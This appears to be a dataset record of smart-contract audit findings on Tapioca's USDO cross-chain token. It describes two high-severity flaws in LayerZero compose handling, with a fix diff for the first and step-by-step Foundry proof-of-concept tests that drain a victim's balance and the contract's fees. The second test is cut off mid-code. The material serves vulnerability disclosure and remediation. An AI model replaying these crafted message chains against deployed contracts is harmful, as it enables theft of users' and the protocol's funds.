leverage Tapioca's remote transfers in order to drain any user's USDO balance. Before diving into the issue, a bit of background regarding compose calls is required in order to properly understand the attack.\\nTapioca allows users to leverage LayerZero's compose calls, which enable complex interactions between messages sent across chains. Compose messages are always preceded by a sender address in order for the destination chain to understand who the sender of the compose message is. When the compose message is received, `TapiocaOmnichainReceiver.lzCompose()` will decode the compose message, extract the `srcChainSender_` and trigger the internal `_lzCompose()` call with the decoded `srcChainSender_` as the sender:\\n```\\n// TapiocaOmnichainReceiver.sol\\nfunction lzCompose( \\n address _from,\\n bytes32 _guid,\\n bytes calldata _message,\\n address, //executor\\n bytes calldata //extra Data\\n ) external payable override {\\n // rest of code\\n \\n // Decode LZ compose message.\\n (address srcChainSender_, bytes memory oftComposeMsg_) =\\n TapiocaOmnichainEngineCodec.decodeLzComposeMsg(_message);\\n\\n // Execute the composed message. \\n _lzCompose(srcChainSender_, _guid, oftComposeMsg_); \\n }\\n```\\n\\nOne of the type of compose calls supported in tapioca are remote transfers. When the internal `_lzCompose()` is triggered, users who specify a msgType equal to `MSG_REMOTE_TRANSFER` will make the `_remoteTransferReceiver()` internal call be executed:\\n```\\n// TapiocaOmnichainReceiver.sol\\nfunction _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers. \\n if (msgType_ == MSG_REMOTE_TRANSFER) { \\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_); \\n\\n // rest of code\\n\\n}\\n```\\n\\nRemote transfers allow users to burn tokens in one chain and mint them in another chain by executing a recursive `_lzSend()` call. In order to burn the tokens, they will first be transferred from an arbitrary owner set by the function caller via the `_internalTransferWithAllowance()` function.\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _remoteTransferReceiver(address _srcChainSender, bytes memory _data) internal virtual {\\n RemoteTransferMsg memory remoteTransferMsg_ = TapiocaOmnichainEngineCodec.decodeRemoteTransferMsg(_data);\\n\\n /// @dev xChain owner needs to have approved dst srcChain `sendPacket()` msg.sender in a previous composedMsg. Or be the same address.\\n _internalTransferWithAllowance(\\n remoteTransferMsg_.owner, _srcChainSender, remoteTransferMsg_.lzSendParam.sendParam.amountLD\\n ); \\n \\n // Make the internal transfer, burn the tokens from this contract and send them to the recipient on the other chain.\\n _internalRemoteTransferSendPacket(\\n remoteTransferMsg_.owner, \\n remoteTransferMsg_.lzSendParam, \\n remoteTransferMsg_.composeMsg \\n ); \\n \\n // rest of code\\n }\\n```\\n\\nAfter transferring the tokens via `_internalTransferWithAllowance()`, `_internalRemoteTransferSendPacket()` will be triggered, which is the function that will actually burn the tokens and execute the recursive `_lzSend()` call:\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _internalRemoteTransferSendPacket( \\n address _srcChainSender,\\n LZSendParam memory _lzSendParam, \\n bytes memory _composeMsg\\n ) internal returns (MessagingReceipt memory msgReceipt, OFTReceipt memory oftReceipt) {\\n // Burn tokens from this contract\\n (uint256 amountDebitedLD_, uint256 amountToCreditLD_) = _debitView(\\n _lzSendParam.sendParam.amountLD, _lzSendParam.sendParam.minAmountLD, _lzSendParam.sendParam.dstEid \\n ); \\n _burn(address(this), amountToCreditLD_); \\n \\n // rest of code\\n \\n // Builds the options and OFT message to quote in the endpoint.\\n (bytes memory message, bytes memory options) = _buildOFTMsgAndOptionsMemory(\\n _lzSendParam.sendParam, _lzSendParam.extraOptions, _composeMsg, amountToCreditLD_, _srcChainSender \\n ); // msgSender is the sender of the composed message. We keep context by passing `_srcChainSender`.\\n \\n // Sends the message to the LayerZero endpoint and returns the LayerZero msg receipt.\\n msgReceipt =\\n _lzSend(_lzSendParam.sendParam.dstEid, message, options, _lzSendParam.fee, _lzSendParam.refundAddress);\\n // rest of code\\n }\\n```\\n\\nAs we can see, the `_lzSend()` call performed inside `_internalRemoteTransferSendPacket()` allows to trigger the remote call with another compose message (built using the `_buildOFTMsgAndOptionsMemory()` function). If there is an actual `_composeMsg` to be appended, the sender of such message will be set to the `_internalRemoteTransferSendPacket()` function's `_srcChainSender` parameter.\\nThe problem is that when `_internalRemoteTransferSendPacket()` is called, the parameter passed as the source chain sender is set to the arbitrary owner address supplied by the caller in the initial compose call, instead of the actual source chain sender:\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _remoteTransferReceiver(address _srcChainSender, bytes memory _data) internal virtual {\\n // rest of code\\n \\n // Make the internal transfer, burn the tokens from this contract and send them to the recipient on the other chain.\\n _internalRemoteTransferSendPacket(\\n remoteTransferMsg_.owner, // <------ This parameter will become the _srcChainSender in the recursive compose message call\\n remoteTransferMsg_.lzSendParam, \\n remoteTransferMsg_.composeMsg \\n ); \\n \\n // rest of code\\n }\\n```\\n\\nThis makes it possible for an attacker to create an attack vector that allows to drain any user's USDO balance. The attack path is as follows:\\nExecute a remote call from chain A to chain B. This call has a compose message that will be triggered in chain B.\\nThe remote transfer message will set the arbitrary `owner` to any victim's address. It is important to also set the amount to be transferred in this first compose call to 0 so that the `attacker` can bypass the allowance check performed inside the `_remoteTransferReceiver()` call.\\nWhen the compose call gets executed, a second packed compose message will be built and triggered inside `_internalRemoteTransferSendPacket()`. This second compose message will be sent from chain B to chain A, and the source chain sender will be set to the arbitrary `owner` address that the `attacker` wants to drain due to the incorrect parameter being passed. It will also be a remote transfer action.\\nWhen chain A receives the compose message, a third compose will be triggered. This third compose is where the token transfers will take place. Inside the `_lzReceive()` triggered in chain A, the composed message will instruct to transfer and burn a certain amount of tokens (selected by the `attacker` when crafting the attack). Because the source chain sender is the victim address and the `owner` specified is also the victim, the `_internalTransferWithAllowance()` executed in chain A will not check for allowances because the `owner` and the spender are the same address (the victim's address). This will burn the attacker's desired amount from the victim's wallet.\\nFinally, a last `_lzSend()` will be triggered to chain B, where the burnt tokens in chain A will be minted. Because the compose calls allow to set a specific recipient address, the receiver of the minted tokens will be the `attacker`.\\nAs a summary: the attack allows to combine several compose calls recursively so that an attacker can burn victim's tokens in Chain A, and mint them in chain B to a desired address. The following diagram summarizes the attack for clarity:\\n\\nThe following proof of concept illustrates how the mentioned attack can take place. In order to execute the PoC, the following steps must be performed:\\nCreate an `EnpointMock.sol` file inside the `test` folder inside `Tapioca-bar` and paste the following code (the current tests are too complex, this imitates LZ's endpoint contracts and reduces the poc's complexity):\\n```\\n// SPDX-License-Identifier: LZBL-1.2\\n\\npragma solidity ^0.8.20;\\n\\nstruct MessagingReceipt {\\n bytes32 guid;\\n uint64 nonce;\\n MessagingFee fee;\\n}\\n\\nstruct MessagingParams {\\n uint32 dstEid;\\n bytes32 receiver;\\n bytes message;\\n bytes options; \\n bool payInLzToken;\\n}\\n\\nstruct MessagingFee {\\n uint256 nativeFee;\\n uint256 lzTokenFee;\\n}\\ncontract MockEndpointV2 {\\n\\n \\n function send(\\n MessagingParams calldata _params,\\n address _refundAddress\\n ) external payable returns (MessagingReceipt memory receipt) {\\n // DO NOTHING\\n }\\n\\n /// @dev the Oapp sends the lzCompose message to the endpoint\\n /// @dev the composer MUST assert the sender because anyone can send compose msg with this function\\n /// @dev with the same GUID, the Oapp can send compose to multiple _composer at the same time\\n /// @dev authenticated by the msg.sender\\n /// @param _to the address which will receive the composed message\\n /// @param _guid the message guid\\n /// @param _message the message\\n function sendCompose(address _to, bytes32 _guid, uint16 _index, bytes calldata _message) external {\\n // DO NOTHING\\n \\n }\\n \\n}\\n```\\n\\nImport and deploy two mock endpoints in the `Usdo.t.sol` file\\nChange the inherited OApp in `Usdo.sol` 's implementation so that the endpoint variable is not immutable and add a `setEndpoint()` function so that the endpoint configured in `setUp()` can be chainged to the newly deployed endpoints\\nPaste the following test insde `Usdo.t.sol` :\\n```\\nfunction testVuln_stealUSDOFromATargetUserDueToWrongParameter() public {\\n\\n // Change configured enpoints\\n\\n endpoints[aEid] = address(mockEndpointV2A);\\n endpoints[bEid] = address(mockEndpointV2B);\\n\\n aUsdo.setEndpoint(address(mockEndpointV2A));\\n bUsdo.setEndpoint(address(mockEndpointV2B));\\n\\n \\n \\n deal(address(aUsdo), makeAddr(""victim""), 100 ether);\\n\\n ////////////////////////////////////////////////////////\\n // PREPARE MESSAGES //\\n ////////////////////////////////////////////////////////\\n\\n // FINAL MESSAGE A ---> B \\n\\n SendParam memory sendParamAToBVictim = SendParam({\\n dstEid: bEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")),\\n amountLD: 100 ether, // IMPORTANT: This must be set to the amount we want to steal\\n minAmountLD: 100 ether,\\n extraOptions: bytes(""""),\\n composeMsg: bytes(""""),\\n oftCmd: bytes("""")\\n }); \\n MessagingFee memory feeAToBVictim = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamAToBVictim = LZSendParam({\\n sendParam: sendParamAToBVictim,\\n fee: feeAToBVictim,\\n extraOptions: bytes(""""),\\n refundAddress: makeAddr(""attacker"")\\n });\\n\\n RemoteTransferMsg memory remoteTransferMsgVictim = RemoteTransferMsg({\\n owner: makeAddr(""victim""), // IMPORTANT: This will make the attack be triggered as the victim will become the srcChainSender in the destination chain\\n composeMsg: bytes(""""),\\n lzSendParam: lzSendParamAToBVictim\\n });\\n\\n uint16 index; // needed to bypass Solidity's encoding literal error\\n // Create Toe Compose message for the victim\\n bytes memory toeComposeMsgVictim = abi.encodePacked(\\n PT_REMOTE_TRANSFER, // msgType\\n uint16(abi.encode(remoteTransferMsgVictim).length), // message length (0)\\n index, // index\\n abi.encode(remoteTransferMsgVictim), // message\\n bytes("""") // next message\\n );\\n\\n // SECOND MESSAGE B ---> A \\n\\n SendParam memory sendParamBToA = SendParam({\\n dstEid: aEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")),\\n amountLD: 0, // IMPORTANT: This must be set to 0 to bypass the allowance check performed inside `_remoteTransferReceiver()`\\n minAmountLD: 0,\\n extraOptions: bytes(""""),\\n composeMsg: bytes(""""),\\n oftCmd: bytes("""")\\n }); \\n MessagingFee memory feeBToA = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamBToA = LZSendParam({\\n sendParam: sendParamBToA,\\n fee: feeBToA,\\n extraOptions: bytes(""""),\\n refundAddress: makeAddr(""attacker"")\\n });\\n\\n // Create remote transfer message\\n RemoteTransferMsg memory remoteTransferMsg = RemoteTransferMsg({\\n owner: makeAddr(""victim""), // IMPORTANT: This will make the attack be triggered as the victim will become the srcChainSender in the destination chain\\n composeMsg: toeComposeMsgVictim,\\n lzSendParam: lzSendParamBToA\\n });\\n\\n // Create Toe Compose message\\n bytes memory toeComposeMsg = abi.encodePacked(\\n PT_REMOTE_TRANSFER, // msgType\\n uint16(abi.encode(remoteTransferMsg).length), // message length\\n index, // index\\n abi.encode(remoteTransferMsg),\\n bytes("""") // next message\\n );\\n \\n // INITIAL MESSAGE A ---> B \\n\\n // Create `_lzSendParam` parameter for `sendPacket()`\\n SendParam memory sendParamAToB = SendParam({\\n dstEid: bEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")),\\n amountLD: 0,\\n minAmountLD: 0,\\n extraOptions: bytes(""""),\\n composeMsg: bytes(""""),\\n oftCmd: bytes("""")\\n }); \\n MessagingFee memory feeAToB = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamAToB = LZSendParam({\\n sendParam: sendParamAToB,\\n fee: feeAToB,\\n extraOptions: bytes(""""),\\n refundAddress: makeAddr(""attacker"")\\n });\\n\\n vm.startPrank(makeAddr(""attacker""));\\n aUsdo.sendPacket(lzSendParamAToB, toeComposeMsg);\\n\\n // EXECUTE ATTACK\\n\\n // Execute first lzReceive() --> receive message in chain B\\n \\n vm.startPrank(endpoints[bEid]);\\n UsdoReceiver(address(bUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(aUsdo)), srcEid: aEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n sendParamAToB.to,\\n index, // amount (use an initialized 0 variable due to Solidity restrictions)\\n OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")),\\n toeComposeMsg\\n ), // message\\n address(0), // executor (not used)\\n bytes("""") // extra data (not used)\\n );\\n\\n // Compose message is sent in `lzReceive()`, we need to trigger `lzCompose()`.\\n // This triggers a message back to chain A, in which the srcChainSender will be set as the victim inside the\\n // composed message due to the wrong parameter passed\\n UsdoReceiver(address(bUsdo)).lzCompose(\\n address(bUsdo), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked(OFTMsgCodec.addressToBytes32(address(aUsdo)), toeComposeMsg), // message\\n address(0), // executor (not used)\\n bytes("""") // extra data (not used)\\n );\\n\\n vm.startPrank(endpoints[aEid]);\\n\\n // Chain A: message is received, internally a compose flow is retriggered.\\n UsdoReceiver(address(aUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(bUsdo)), srcEid: bEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n sendParamAToB.to,\\n index, // amount\\n OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")),\\n toeComposeMsgVictim\\n ), // message\\n address(0), // executor (not used)\\n bytes("""") // extra data (not used)\\n );\\n\\n // Compose message is sent in `lzReceive()`, we need to trigger `lzCompose()`.\\n // At this point, the srcChainSender is the victim (as set in the previous lzCompose) because of the wrong parameter (the `expectEmit` verifies it).\\n // The `owner` specified for the remote transfer is also the victim, so the allowance check is bypassed because `owner` == `srcChainSender`.\\n // This allows the tokens to be burnt, and a final message is triggered to the destination chain\\n UsdoReceiver(address(aUsdo)).lzCompose(\\n address(aUsdo), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked(OFTMsgCodec.addressToBytes32(address(makeAddr(""victim""))), toeComposeMsgVictim), // message (srcChainSender becomes victim because of wrong parameter set)\\n address(0), // executor (not used)\\n bytes("""") // extra data (not used)\\n );\\n\\n // Back to chain B. Finally, the burnt tokens from the victim in chain A get minted in chain B with the attacker set as the destination\\n {\\n uint64 tokenAmountSD = usdoHelper.toSD(100 ether, bUsdo.decimalConversionRate());\\n \\n vm.startPrank(endpoints[bEid]);\\n UsdoReceiver(address(bUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(aUsdo)), srcEid: aEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")),\\n tokenAmountSD\\n ), // message\\n address(0), // executor (not used)\\n bytes("""") // extra data (not used)\\n );\\n\\n }\\n\\n // Finished: victim gets drained, attacker obtains balance of victim\\n assertEq(bUsdo.balanceOf(makeAddr(""victim"")), 0);\\n assertEq(bUsdo.balanceOf(makeAddr(""attacker"")), 100 ether);\\n \\n } \\n```\\n\\nRun the poc with the following command: `forge test --mt testVuln_stealUSDOFromATargetUserDueToWrongParameter`\\nThe proof of concept shows how in the end, the victim's `aUsdo` balance will become 0, while all the `bUsdo` in chain B will be minted to the attacker.","Change the parameter passed in the `_internalRemoteransferSendPacket()` call so that the sender in the compose call built inside it is actually the real source chain sender. This will make it be kept along all the possible recursive calls that might take place:\\n```\\nfunction _remoteTransferReceiver(address _srcChainSender, bytes memory _data) internal virtual {\\n RemoteTransferMsg memory remoteTransferMsg_ = TapiocaOmnichainEngineCodec.decodeRemoteTransferMsg(_data);\\n\\n /// @dev xChain owner needs to have approved dst srcChain `sendPacket()` msg.sender in a previous composedMsg. Or be the same address.\\n _internalTransferWithAllowance(\\n remoteTransferMsg_.owner, _srcChainSender, remoteTransferMsg_.lzSendParam.sendParam.amountLD\\n ); \\n \\n // Make the internal transfer, burn the tokens from this contract and send them to the recipient on the other chain.\\n _internalRemoteTransferSendPacket(\\n// Remove the line below\\n remoteTransferMsg_.owner,\\n// Add the line below\\n _srcChainSender\\n remoteTransferMsg_.lzSendParam, \\n remoteTransferMsg_.composeMsg \\n ); \\n \\n emit RemoteTransferReceived(\\n remoteTransferMsg_.owner,\\n remoteTransferMsg_.lzSendParam.sendParam.dstEid,\\n OFTMsgCodec.bytes32ToAddress(remoteTransferMsg_.lzSendParam.sendParam.to),\\n remoteTransferMsg_.lzSendParam.sendParam.amountLD\\n );\\n }\\n```\\n",High. An attacker can drain any USDO holder's balance and transfer it to themselves.,"```\\n// TapiocaOmnichainReceiver.sol\\nfunction lzCompose( \\n address _from,\\n bytes32 _guid,\\n bytes calldata _message,\\n address, //executor\\n bytes calldata //extra Data\\n ) external payable override {\\n // rest of code\\n \\n // Decode LZ compose message.\\n (address srcChainSender_, bytes memory oftComposeMsg_) =\\n TapiocaOmnichainEngineCodec.decodeLzComposeMsg(_message);\\n\\n // Execute the composed message. \\n _lzCompose(srcChainSender_, _guid, oftComposeMsg_); \\n }\\n```\\n" +Recursive _lzCompose() call can be leveraged to steal all generated USDO fees,high,"It is possible to steal all generated USDO fees by leveraging the recursive _lzCompose() call triggered in compose calls.\\nThe `USDOFlashloanHelper` contract allows users to take USDO flash loans. When a user takes a flash loan some fees will be enforced and transferred to the USDO contract:\\n```\\n// USDOFlashloanHelper.sol\\nfunction flashLoan(IERC3156FlashBorrower receiver, address token, uint256 amount, bytes calldata data)\\n external\\n override\\n returns (bool)\\n {\\n \\n // rest of code\\n\\n IERC20(address(usdo)).safeTransferFrom(address(receiver), address(usdo), fee);\\n \\n _flashloanEntered = false;\\n\\n return true;\\n }\\n```\\n\\nSuch fees can be later retrieved by the owner of the USDO contract via the `extractFees()` function:\\n```\\n// Usdo.sol\\nfunction extractFees() external onlyOwner { \\n if (_fees > 0) {\\n uint256 balance = balanceOf(address(this));\\n\\n uint256 toExtract = balance >= _fees ? _fees : balance;\\n _fees -= toExtract;\\n _transfer(address(this), msg.sender, toExtract);\\n }\\n }\\n```\\n\\nHowever, such fees can be stolen by an attacker by leveraging a wrong parameter set when performing a compose call.\\nWhen a compose call is triggered, the internal `_lzCompose()` call will be triggered. This call will check the `msgType_` and execute some logic according to the type of message requested. After executing the corresponding logic, it will be checked if there is an additional message by checking the `nextMsg_.length`. If the compose call had a next message to be called, a recursive call will be triggered and `_lzCompose()` will be called again:\\n```\\n// TapiocaOmnichainReceiver.sol\\n\\nfunction _lzCompose(address srcChainSender_, bytes32 _guid, bytes memory oftComposeMsg_) internal {\\n \\n // Decode OFT compose message.\\n (uint16 msgType_,,, bytes memory tapComposeMsg_, bytes memory nextMsg_) =\\n TapiocaOmnichainEngineCodec.decodeToeComposeMsg(oftComposeMsg_);\\n\\n // Call Permits/approvals if the msg type is a permit/approval.\\n // If the msg type is not a permit/approval, it will call the other receivers. \\n if (msgType_ == MSG_REMOTE_TRANSFER) { \\n _remoteTransferReceiver(srcChainSender_, tapComposeMsg_); \\n } else if (!_extExec(msgType_, tapComposeMsg_)) { \\n // Check if the TOE extender is set and the msg type is valid. If so, call the TOE extender to handle msg.\\n if ( \\n address(tapiocaOmnichainReceiveExtender) != address(0)\\n && tapiocaOmnichainReceiveExtender.isMsgTypeValid(msgType_)\\n ) { \\n bytes memory callData = abi.encodeWithSelector(\\n ITapiocaOmnichainReceiveExtender.toeComposeReceiver.selector,\\n msgType_,\\n srcChainSender_, \\n tapComposeMsg_\\n ); \\n (bool success, bytes memory returnData) =\\n address(tapiocaOmnichainReceiveExtender).delegatecall(callData);\\n if (!success) {\\n revert(_getTOEExtenderRevertMsg(returnData));\\n }\\n } else {\\n // If no TOE extender is set or msg type doesn't match extender, try to call the internal receiver.\\n if (!_toeComposeReceiver(msgType_, srcChainSender_, tapComposeMsg_)) {\\n revert InvalidMsgType(msgType_);\\n }\\n }\\n }\\n \\n emit ComposeReceived(msgType_, _guid, tapComposeMsg_);\\n if (nextMsg_.length > 0) {\\n _lzCompose(address(this), _guid, nextMsg_);\\n }\\n }\\n```\\n\\nAs we can see in the code snippet's last line, if `nextMsg_.length > 0` an additional compose call can be triggered . The problem with this call is that the first parameter in the `_lzCompose()` call is hardcoded to be `address(this)` (address of USDO), making the `srcChainSender_` become the USDO address in the recursive compose call.\\nAn attacker can then leverage the remote transfer logic in order to steal all the USDO tokens held in the USDO contract (mainly fees generated by flash loans).\\nForcing the recursive call to be a remote transfer, `_remoteTransferReceiver()` will be called. Because the source chain sender in the recursive call is the USDO contract, the `owner` parameter in the remote transfer (the address from which the remote transfer tokens are burnt) can also be set to the USDO address, making the allowance check in the `_internalTransferWithAllowance()` call be bypassed, and effectively burning a desired amount from USDO.\\n```\\n// USDO.sol\\nfunction _remoteTransferReceiver(address _srcChainSender, bytes memory _data) internal virtual {\\n RemoteTransferMsg memory remoteTransferMsg_ = TapiocaOmnichainEngineCodec.decodeRemoteTransferMsg(_data);\\n\\n \\n /// @dev xChain owner needs to have approved dst srcChain `sendPacket()` msg.sender in a previous composedMsg. Or be the same address.\\n _internalTransferWithAllowance(\\n remoteTransferMsg_.owner, _srcChainSender, remoteTransferMsg_.lzSendParam.sendParam.amountLD\\n ); \\n \\n // rest of code\\n }\\n\\nfunction _internalTransferWithAllowance(address _owner, address srcChainSender, uint256 _amount) internal {\\n \\n if (_owner != srcChainSender) { // <------- `_owner` and `srcChainSender` will both be the USDO address, so the check in `_spendAllowance()` won't be performed\\n _spendAllowance(_owner, srcChainSender, _amount);\\n }\\n \\n _transfer(_owner, address(this), _amount);\\n } \\n```\\n\\nAfter burning the tokens from USDO, the remote transfer will trigger a call to a destination chain to mint the burnt tokens in the origin chain. The receiver of the tokens can be different from the address whose tokens were burnt, so an attacker can obtain the minted tokens in the destination chain, effectively stealing all USDO balance from the USDO contract.\\nAn example attack path would be:\\nAn attacker creates a compose call from chain A to chain B. This compose call is actually composed of two messages:\\nThe first message, which won't affect the attack and is simply the initial step to trigger the attack in the destination chain\\nThe second message (nextMsg), which is the actual compose message that will trigger the remote transfer and burn the tokens in chain B, and finally trigger a call back to chain A to mint he tokens\\nThe call is executed, chain B receives the call and triggers the first compose message (as demonstrated in the PoC, this first message is not important and can simply be a remote transfer call with a 0 amount of tokens). After triggering the first compose call, the second compose message is triggered. The USDO contract is set as the source chain sender and the remote transfer is called. Because the owner set in the compose call and the source chain sender are the same, the specified tokens in the remote transfer are directly burnt\\nFinally, the compose call triggers a call back to chain A to mint the burnt tokens in chain B, and tokens are minted to the attacker\\n\\nThe following proof of concept illustrates how the mentioned attack can take place. In order to execute the PoC, the following steps must be performed:\\nCreate an `EnpointMock.sol` file inside the `test` folder inside `Tapioca-bar` and paste the following code (the current tests are too complex, this imitates LZ's endpoint contracts and reduces the poc's complexity):\\n```\\n// SPDX-License-Identifier: LZBL-1.2\\n\\npragma solidity ^0.8.20;\\n\\nstruct MessagingReceipt {\\n bytes32 guid;\\n uint64 nonce;\\n MessagingFee fee;\\n}\\n\\nstruct MessagingParams {\\n uint32 dstEid;\\n bytes32 receiver;\\n bytes message;\\n bytes options; \\n bool payInLzToken;\\n}\\n\\nstruct MessagingFee {\\n uint256 nativeFee;\\n uint256 lzTokenFee;\\n}\\ncontract MockEndpointV2 {\\n\\n \\n function send(\\n MessagingParams calldata _params,\\n address _refundAddress\\n ) external payable returns (MessagingReceipt memory receipt) {\\n // DO NOTHING\\n }\\n\\n /// @dev the Oapp sends the lzCompose message to the endpoint\\n /// @dev the composer MUST assert the sender because anyone can send compose msg with this function\\n /// @dev with the same GUID, the Oapp can send compose to multiple _composer at the same time\\n /// @dev authenticated by the msg.sender\\n /// @param _to the address which will receive the composed message\\n /// @param _guid the message guid\\n /// @param _message the message\\n function sendCompose(address _to, bytes32 _guid, uint16 _index, bytes calldata _message) external {\\n // DO NOTHING\\n \\n }\\n \\n}\\n```\\n\\nImport and deploy two mock endpoints in the `Usdo.t.sol` file\\nChange the inherited OApp in `Usdo.sol` 's implementation so that the endpoint variable is not immutable and add a `setEndpoint()` function so that the endpoint configured in `setUp()` can be chainged to the newly deployed endpoints\\nPaste the following test insde `Usdo.t.sol` :\\n```\\nfunction testVuln_USDOBorrowFeesCanBeDrained() public {\\n\\n // Change configured enpoints\\n\\n endpoints[aEid] = address(mockEndpointV2A);\\n endpoints[bEid] = address(mockEndpointV2B);\\n\\n aUsdo.setEndpoint(address(mockEndpointV2A));\\n bUsdo.setEndpoint(address(mockEndpointV2B));\\n\\n \\n // Mock generated fees\\n deal(address(bUsdo), address(bUsdo), 100 ether);\\n\\n ////////////////////////////////////////////////////////\\n // PREPARE MESSAGES //\\n ////////////////////////////////////////////////////////\\n\\n // NEXT MESSAGE B --> A (EXECUTED AS THE nextMsg after the INITIAL B --> A MESSAGE) \\n\\n SendParam memory sendParamAToBVictim = SendParam({\\n dstEid: aEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")),\\n amountLD: 100 ether, // IMPORTANT: This must be set to the amount we want to steal\\n minAmountLD: 100 ether,\\n extraOptions: bytes(""""),\\n composeMsg: bytes(""""),\\n oftCmd: bytes("""")\\n }); \\n MessagingFee memory feeAToBVictim = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamAToBVictim = LZSendParam({\\n sendParam: sendParamAToBVictim,\\n fee: feeAToBVictim,\\n extraOptions: bytes(""""),\\n refundAddress: makeAddr(""attacker"")\\n });\\n\\n RemoteTransferMsg memory remoteTransferMsgVictim = RemoteTransferMsg({\\n owner: address(bUsdo), // IMPORTANT: This will make the attack be triggered as bUsdo will become the srcChainSender in the nextMsg compose call\\n composeMsg: bytes(""""),\\n lzSendParam: lzSendParamAToBVictim\\n });\\n\\n uint16 index; // needed to bypass Solidity's encoding literal error\\n // Create Toe Compose message for the victim\\n bytes memory toeComposeMsgVictim = abi.encodePacked(\\n PT_REMOTE_TRANSFER, // msgType\\n uint16(abi.encode(remoteTransferMsgVictim).length), // message length (0)\\n index, // index\\n abi.encode(remoteTransferMsgVictim), // message\\n bytes("""") // next message\\n );\\n \\n // SECOND MESSAGE (composed) B ---> A \\n // This second message is a necessary step in order to reach the execution\\n // inside `_lzCompose()` where the nextMsg can be triggered\\n\\n SendParam memory sendParamBToA = SendParam({\\n dstEid: aEid,\\n to: OFTMsgCodec.addressToBytes32(address(aUsdo)),\\n amountLD: 0, \\n minAmountLD: 0,\\n extraOptions: bytes(""""),\\n composeMsg: bytes(""""),\\n oftCmd: bytes("""")\\n }); \\n MessagingFee memory feeBToA = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamBToA = LZSendParam({\\n sendParam: sendParamBToA,\\n fee: feeBToA,\\n extraOptions: bytes(""""),\\n refundAddress: makeAddr(""attacker"")\\n });\\n\\n // Create remote transfer message\\n RemoteTransferMsg memory remoteTransferMsg = RemoteTransferMsg({\\n owner: makeAddr(""attacker""),\\n composeMsg: bytes(""""),\\n lzSendParam: lzSendParamBToA\\n });\\n\\n // Create Toe Compose message\\n bytes memory toeComposeMsg = abi.encodePacked(\\n PT_REMOTE_TRANSFER, // msgType\\n uint16(abi.encode(remoteTransferMsg).length), // message length\\n index, // index\\n abi.encode(remoteTransferMsg),\\n toeComposeMsgVictim // next message: IMPORTANT to set this to the A --> B message that will be triggered as the `nextMsg`\\n );\\n \\n // INITIAL MESSAGE A ---> B \\n\\n // Create `_lzSendParam` parameter for `sendPacket()`\\n SendParam memory sendParamAToB = SendParam({\\n dstEid: bEid,\\n to: OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")), // address here doesn't matter\\n amountLD: 0,\\n minAmountLD: 0,\\n extraOptions: bytes(""""),\\n composeMsg: bytes(""""),\\n oftCmd: bytes("""")\\n }); \\n MessagingFee memory feeAToB = MessagingFee({\\n nativeFee: 0,\\n lzTokenFee: 0\\n });\\n \\n LZSendParam memory lzSendParamAToB = LZSendParam({\\n sendParam: sendParamAToB,\\n fee: feeAToB,\\n extraOptions: bytes(""""),\\n refundAddress: makeAddr(""attacker"")\\n });\\n\\n vm.startPrank(makeAddr(""attacker""));\\n aUsdo.sendPacket(lzSendParamAToB, toeComposeMsg);\\n\\n // EXECUTE ATTACK\\n\\n // Execute first lzReceive() --> receive message in chain B\\n \\n vm.startPrank(endpoints[bEid]);\\n UsdoReceiver(address(bUsdo)).lzReceive(\\n Origin({sender: OFTMsgCodec.addressToBytes32(address(aUsdo)), srcEid: aEid, nonce: 0}), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n abi.encodePacked( // same as _buildOFTMsgAndOptions()\\n sendParamAToB.to,\\n index, // amount (use an initialized 0 variable due to Solidity restrictions)\\n OFTMsgCodec.addressToBytes32(makeAddr(""attacker"")), // initially, the sender for the first A --> B message is the attacker\\n toeComposeMsg\\n ), // message\\n address(0), // executor (not used)\\n bytes("""") // extra data (not used)\\n );\\n\\n // Compose message is sent in `lzReceive()`, we need to trigger `lzCompose()`.\\n // bUsdo will be burnt from the bUSDO address, and nextMsg will be triggered to mint the burnt amount in chain A, having \\n // the attacker as the receiver\\n UsdoReceiver(address(bUsdo)).lzCompose(\\n address(bUsdo), \\n OFTMsgCodec.addressToBytes32(address(0)), // guid (not needed for the PoC)\\n 